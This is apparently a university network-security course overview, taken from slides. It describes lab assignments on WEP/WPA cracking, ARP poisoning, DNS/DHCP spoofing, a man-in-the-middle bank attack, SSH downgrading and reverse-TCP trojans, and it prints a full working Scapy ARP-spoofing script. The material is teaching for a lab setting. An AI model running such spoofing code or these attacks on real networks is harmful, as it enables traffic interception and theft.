TIES327 Network Security (3-5 ECTS) Prof. Timo Hämäläinen timo.t.hamalainen@jyu.fi Department of Mathematical Information Technology IT Faculty University of Jyväskylä
Important note! If you have completed the "old course" TIES326 in year 2012 or 2013, you will not get credits from this TIES327, as its' content has more than 50% similar assignments as TIES326 has in 2012 and 2013. Those students who has completed TIES326 before 2012, has possibility to get credits from TIES327.
Goals of the course Students understand what the term "security" keep inside in particular in the networks and services point of view... get familiar with the different security aspects and to understand the necessary terms are cabable to apply the various tools in auditing and protecting against network attacks... learn to look for a new knowledge about this area The feeling of safety can not to be ignorance! The course focuses on hands-on making of the security issues and learning by doing different networking security exercises Remember: Use of the presented methods are illegal in the public networks!!
Prerequisites Basic knowledge about networks, TCP/IP- protocols and programming For example courses (or similar knowledge) ITKP101- Tietokone ja tietoverkot työvälineenä ITKP104 Tietoverkot ITKP102 - Ohjelmointi 1
Complete assignments Group of 1-3 students How to complete course? You should get at least 50% of total points and at least the same 50% of the each assignments. 3 ECTS fulfilment: complete assignments 1-9 4 ECTS fulfilment: complete assignments 1-11 5 ECTS fulfilment complete all 13 assignments Different network attack configurations, tools for protecting and analysing networks MITM, WLAN cracking, VPN, Firewall, IDS etc. pfsense: http://www.pfsense.org/ Snort: http://www.snort.org/ Radamsa: http://code.google.com/p/ouspg/wiki/radamsa Wireshark: http://www.wireshark.org/ Scapy: http://secdev.org/projects/scapy/ Kali Linux: http://www.kail.org/ Exam (not obligatory, upgrading the grade, max. 15points.)
About the assignments 1. Virtual network configuration In this first assignment, you will create and configure virtual network which will be used for testing different kinds of network attack. To do this you need an PC with 2 Gb of RAM (bigger is of course better!). We have used Ubuntu, but it is of course possible to make the same virtual network configuration, if you have Windows or Mac OS by using corresponding commands. https://www.virtualbox.org/
2: Security in social media/students presentations (lecture 3) Group of 1-4 students will make a presentation. The topic is security in social media (duration of the presentation 20-25 min). Presentation should have the following aspects. Even better, if you can create own live demo like eg. http://www.youtube.com/watch?v=- H1qjiwQldw: 1. What kind of threats/attacks there exist in social media? Social engineering, phising, Spam, code-injections, XSS, CSRF/XSRF, DDoS etc. 2. How can you protect against these threats? 3. Possibilities and drawbacks of Web technologies Asynchronous JavaScript And XML (AJAX), Cascading Style Sheet (CSS), Flash, JSON ja XML etc. All groups will return www- link (no attachment!) to their presentation by 9.11 time 23:59 to: timo.t.hamalainen@jyu.fi. At the beginning of the lecture we will randomly select four groups to keep their presentations
About the assingments 3. WEP Cracking In this assignment you are going to crack a WEP key with tools available at: http://aircrack-ng.org/ It is intended to build your basic skills and get you familiar with the wireless network security concepts. It assumes you have a working wireless card with drivers already patched for injection. The basic concept behind this work is using aireplay-ng, which will replay an ARP packet to generate new unique IVs. In turn, aircrack-ng uses the new unique IVs to crack the WEP key. It is important to understand what an ARP packet is (http://tools.ietf.org/html/rfc826).
4. WPA Cracking This assignment walks you through cracking WPA/WPA2 networks which use pre-shared keys. We recommend you do some background reading to better understand what WPA/WPA2 is. WPA/WPA2 supports many types of authentication beyond pre-shared keys. aircrack-ng can ONLY crack pre-shared keys. So make sure airodump-ng shows the network as having the authentication type of PSK, otherwise, don't bother trying to crack it. There is another important difference between cracking WPA/WPA2 and WEP. This is the approach used to crack the WPA/WPA2 pre-shared key. Unlike WEP, where statistical methods can be used to speed up the cracking process, only plain brute force techniques can be used against WPA/WPA2. That is, because the key is not static, so collecting IVs like when cracking WEP encryption, does not speed up the attack. The only thing that does give the information to start an attack is the handshake between client and AP. Handshaking is done when the client connects to the network. Although not absolutely true, for the purposes of this assignment, consider it true. Since the pre-shared key can be from 8 to 63 characters in length, it effectively becomes impossible to crack the pre-shared key. The only time you can crack the pre-shared key is if it is a dictionary word or relatively short in length.
5. ARP Poisoning In this assignment you are going to perform two Man-In-The-Middle (MITM) attacks: poisoning ARP tables and redirecting ICMP traffic ARP poisoning is also known as ARP Spoofing, ARP Flooding and ARP Poisoning Routing. So what basically is ARP poisoning? It is technique which allows an attacker sniffs traffic from LAN, monitors it and even stop it. ARP poisoning is done by sending fake or spoofed messages to an Ethernet LAN card. By doing so an attacker manages to associate its MAC address with IP address of another node on network (which is basically default gateway IP). Then the traffic meant for gateway first goes to attacker and then to gateway thus allowing attacker to sniff traffic from network.
5. ICMP Redirection ICMP (Internet Control Message Protocol) is used to send error messages, report problems and for routing purposes. When the router sends to the client for route redirection and indicates a shorter route to some particular destination, a host-route entry is added to the clients routing table. The attacker can change the clients routing table so as traffic from the client to a web server will be redirected to the attacker. For this purpose the attacker sends ICMP redirect message to the client, in which source IP is the gateway, source IP for redirection is the client, destination IP for redirection is the web server and gateway is the attacker. After the client updates its routing table with the web servers IP address and the attackers IP address, all traffic from the client to the web server is redirected to the attacker.
6. DNS spoofing In this exercise you are going to perform two Man-In-The-Middle (MITM) attacks: spoofing DNS and DHCP servers. The Domain Name System translates names that human can understand to IP addresses. First, the client sends DNS query and the DNS server responds with DNS response. The DNS query and response have identical ID number and query. Then the client updates its DNS cache entries accordingly domain name and IP address. Assume that the attacker wants to change the clients DNS cache so that traffic from client to the domain web.seclab,jyu.fi. will be redirected to the attackers server 192.168.1.102. For this purpose the attacker snifs DNS queries from the client and waits for DNS query with the relevant query, then the attacker spoofs a DNS response e.g. with the attacker's IP. Client updates its DNS cache and therefore all traffic goes to the attacker. Attacker repeats to spoof DNS responses to maintain a valid cache. However DNS query eventually arrives the DNS server and the server will respond with a legitimate DNS response. When the client gets the legitimate response, it will update its cache. For this reason, ARP poisoning of the client should be done before DNS spoofing. In this section, we show how to spoof the DNS server.
6. DHCP spoofing The DHCP (Dynamic Host Configuration Protocol) is used to configure network settings to hosts on IP networks. DHCP allows hosts to be dynamically configured with IP address, subnet mask, gateway address and DNS server address. It works as follows: first, the client sends (broadcasts) DHCP discover containing transaction ID. The DHCP server responds with DHCP offer which contains the same transaction ID. The client then sends DHCP request and the DHCP server responds with DHCP Ack. When the attacker applying DHCP spoofing attack an attacker waits for DHCP discover request from the client.
6. DHCP spoofing After getting this request the attacker spoofs a DHCP offer with assigning malicious gateway or/and DNS server. After that the client responds with DHCP request and the attacker spoofs a DHCP Ack as well. Finally, the client updates its DNS server and gateway addresses. However, when DHCP discover arrives the DHCP server this server responds to the client with a legitimate DHCP offer. If the client gets the legitimate offer first then DHCP spoofing will not work. For this reason, the attacker DoS the DHCP server during the attack so as DHCP server can not respond to clients. In this section, we show how to spoof the DHCP server.
7. Annoying HTTP server and bank attack This assignment explains deals with two Man-In-The-Middle (MITM) attacks: annoying HTTP server and bank attack. Once an attacker has been located in the middle between his victim and other network nodes, he can easily change HTTP requests and responses which go through him. In this section, the attacker changes web pages which the victim requested from a web site to make the victim feel nervous. For this attack, the attacker first poisons the ARP cache of the victim in order to be "in the middle". Then when the victim requests a web page he modifies all pictures contained on the page and sends the result to the victim. Bank attack In this section, we use the case when the attacker places himself "in the middle" and then steals money from the victim's bank account, when the victim logs in to the system. Despite the fact that cryptographic protocol SSL is used by the bank web site, the attacker is still able to make transfer of the victim's money to another bank account.
8. SSH downgrading Secure Shell (SSH) is a cryptographic network protocol for secure data communication, remote shell services or command execution and other secure network services between two networked computers that it connects via a secure channel over an insecure network. The protocol specification distinguishes two major versions that are referred to as SSH-1 and SSH-2. Here we consider the most famous example of a downgrade attack where the attacker forces the client and the server to use the insecure SSH-1 protocol. The client sends a request to establish a SSH link to the server and asks it for the version it supports. The server answers either with: - ssh-2.xx, i.e. the server supports only SSH-2, - ssh-1.99, i.e. the server supports SSH-1 and SSH-2, - ssh-1.51, i.e. the server supports only SSH-1. In our example, the server is configured to support both SSH-1 and SSH-2 and the client is set to use SSH-2 and SSH-1 but SSH-2 as a preference. In this case the hacker if he already is located in the middle (e.g. after applying ARP poisoning) will change the answer by modifying the "1.99" string to "1.51" to indicate to the client that the server supports only SSH-1 and thus forces the client to open a SSH-1 link. The client who thinks to use the secure SSH-2 protocol will login with SSH-1 and the password will be immediately captured by the hacker because of the SSH-1 weak password authentication mechanism.
9. Reverse TCP attack Man-In-The-Middle attacks can be combined with such dangerous attacks as reverse TCP connection. A firewall usually blocks open ports, but does not block outgoing traffic, therefore a reverse connection is used to bypass firewall and router security restrictions. For example, a Trojan horse running on a computer behind a firewall that blocks incoming connections can easily open an outbound connection to a remote host on the Internet. Once the connection is established, the remote host can send commands to the Trojan horse. Trojan horses that use a reverse connection usually send SYN (TCP) packets to the attacker's IP address. The attacker listens for these SYN packets and accepts the desired connections.
10. Configuring VPN connection with the help of OpenVPN This assignment is used to configure OpenVPN server and client, set up your own Certificate Authority (CA), generate keys and sign certificates. In addition, it describes dual-factor authentication based on username and password, which are used by the server for authenticating a connecting client. OpenVPN is a full-featured SSL VPN which implements secure network extension using the industry standard SSL/TLS protocol, supports exible client authentication methods based on certicates, smart cards, and/or username/password credentials, and allows user or group-specific access control policies using firewall rules applied to the VPN virtual interface.
11. Public-key cryptography with GNU Privacy Guard Public-key cryptography allows you to communicate with someone securely without exchanging a secret password first. With public-key encryption, instead of sharing a password, each party generates a "keypair consisting of a "public" key and a "secret/private" key. Each party can then publish their "public" key to the world or send it directly to the other party, while keeping their secret key private and safe. If you have Person's public key, you can do a few things with it: Encrypt a message that only that Person can decrypt (they need their secret key to decrypt it). Validate that Person signed a message with their secret key. This also lets you verify strongly that the message was not corrupted nor modified in transmission. With your secret key, you can do following things: Decrypt messages encrypted with your public key. Sign messages that others can verify came from you (they need your public key to verify the signature). This assignment explains how to configure and use Public Key Infrastructure (PKI), encrypt les and sign emails by using GNU Privacy Guard (GPG). The GNU privacy guard is the GNU project's complete and free implementation of the OpenPGP standard as defined by RFC4880. GPG allows to encrypt and sign your data and communication, features a versatile key management system as well as access modules for all kinds of public key directories
12. Configuration of Snort and pfsense In this assignment you are going to install, configure and tune Snort and pfsense for protecting your network. Snort is a free and open source network intrusion prevention system and network intrusion detection system (signature based) pfsense is an open source firewall/router computer software distribution based on FreeBSD.
13. Network traffic anomaly detection In this assignment, HTTP access log file is preprocessed into a numerical matrix, anomalous queries are found using dimensionality reduction and clustering, and finally anomalous log lines are analyzed. In this exercise, it is assumed that some kind of Linux distribution is used (running in virtualbox etc. is ne) Windows installation might be possible, but it is much easier on Linux. In the following examples, Octave software is used In addition, we need the package octave-statistics. If available, Matlab uses the same syntax. Python is also used, because the character distribution file will be generated with it from the Apache log file.
Tools used in assignments Kali Linux http://www.kali.org/ From the creators of BackTrack comes Kali Linux, the most advanced and versatile penetration testing distribution ever created. BackTrack has grown far beyond its humble roots as a live CD and has now become a full-fledged operating system
Some tools used in assignments Python https://www.python.org/ Scapy http://secdev.org/projects/scapy/ Scapy is a powerful interactive packet manipulation program. It is able to forge or decode packets of a wide number of protocols, send them on the wire, capture them, match requests and replies, and much more. It can easily handle most classical tasks like scanning, tracerouting, probing, unit tests, attacks or network discovery (it can replace hping, 85% of nmap, arpspoof, arp-sk, arping, tcpdump, tethereal, p0f, etc.). It also performs very well at a lot of other specific tasks that most other tools can't handle, like sending invalid frames, injecting your own 802.11 frames, combining technics (VLAN hopping+arp cache poisoning, VOIP decoding on WEP encrypted channel,...), etc.
Tools used in assignments Python scripts ARP poisoning ICMP Redirection DNS spoofing DHCP spoofing Annoying HTTP server Bank attack SSH downgrading Other files Login database for the bank server Certificate file for the bank server Bank server Keylogger for the Ubuntu reverse tcp attack Keylog reader for the Ubuntu reverse tcp attack
An example: ARP poisoning (Python) from scapy.all import * from time import sleep import threading import os, sys class SpoofThread (threading.thread): def init (self, victim, gateway): self.packet = ARP() self.packet.psrc = gateway self.packet.pdst = victim threading.thread. init (self) def run (self): counter = 0 print "spoofing " + str(self.packet.pdst) + " every 5 seconds..." try: while 1: send(self.packet, verbose=0); counter += 1 print 'poison #' + str(counter) sleep(5); except Exception as e: print type(e) print e.args print e pass if name == ' main ': if len(sys.argv)!= 3: sys.exit('usage: %s <victim(s) IP(s)> <spoofed source IP> \n example: python ArpSpoofing.py 192.168.72.128 192.168.72.2' % os.path.basename( file )) targets_dest_ips = [sys.argv[1]] spoofed_src_ip = sys.argv[2] for ip in targets_dest_ips: SpoofThread(ip, spoofed_src_ip).start()
Total points Grade 55 5 50 4 45 3 40 2 30 1 Course grading Work load Ca. 150 hours, consisting of lectures ca. 20 hours, assignments x hours, of course depending on your background skills.
About the lectures The lectures are intended to provide introduction to various networking security topics and examples The course focuses on hands-on making of the security issues and learning by doing (not learning by listening!). Some literature: Lot of research papers - IEEE Explore, http://ieeexplore.ieee.org/xplore/dynhome.jsp - ACM, http://portal.acm.org/dl.cfm - Google scholar, http://scholar.google.com/ http://site.ebrary.com/lib/jyvaskyla Introduction to Network Security Hacking Exposed Web 2.0 : Web 2.0 Security Secrets and Solutions CEH : Certified Ethical Hacker Study Guide
L1: Introduction to the network security What is security and what are the goals Threats of networks and IT- systems Security policies Risk calculation Security offenses Social Engineering Phishing Legislation
L2: Recent networking security threats/malwares (visiting lecture by Matti Kannela) Trojan horses Rootkits Spyware Worms Viruses Adware Backdoors Ransomware Etc.
L3 : Security in social media (students presentations) Assignment no. 2 Group of 1-4 students will make a presentation. The topic is security in social media (duration of the presentation 20-25 min). Presentation should have the following aspects. Even better, if you can create own live demo like eg. http://www.youtube.com/watch?v=- H1qjiwQldw: 1. What kind of threats/attacks there exist in social media? Social engineering, phising, Spam, code-injections, XSS, CSRF/XSRF, DDoS etc. 2. How can you protect against these threats? 3. Possibilities and drawbacks of Web technologies Asynchronous JavaScript And XML (AJAX), Cascading Style Sheet (CSS), Flash, JSON ja XML etc. All groups will return www- link (no attachment!) to their presentation by 9.11 time 23:59 to: timo.t.hamalainen@jyu.fi. At the beginning of the lecture we will randomly select four groups to keep their presentations
L4: Security for 4G Cellular Networks (visiting lecture by Zheng Chang) Cellural networks security issues (PHY/MAC layers) SECURITY THREATS User Identity Femtocells Interoperability RRC signalling Other threats Being an all-ip networks makes the system vulnerable against IP attacks, such Deny of Service (DoS) over the public IP addresses of the core network interfaces, traffic eavesdropping and injection attacks.
L5: Modelling attacks (visiting lecture by Simo Huopio, Finnish defence forces) Modelling and analysing attacks against network and services DDoS (Distributed Denial of Service) Zero-Day attacks APT (Advanced Persistent Threat) Fuzzing/testing programs vulnerabilities
L6: Protecting your networked services (visiting lecture by Tapio Väärämäki, Exclusive Networks Finland) CARM Cyber Attack Remediation and Mitigation UTM (Unified Threat Management) NGFW (Next Generation Firewall) WAF (Web Application Firewall) Database Security File Security Endpoint Security
L7: Monitoring and analysing the nework data Normal netwok behaviour Anomality detection How to gather data Pre-processing and analysing the data
Some links http://www.cert.fi/ http://www.vm.fi/tietoturvallisuus http://www.digitoday.fi/tietoturva http://www.securityfocus.com http://www.secureworks.com/cyber-threatintelligence/advanced-threat-services/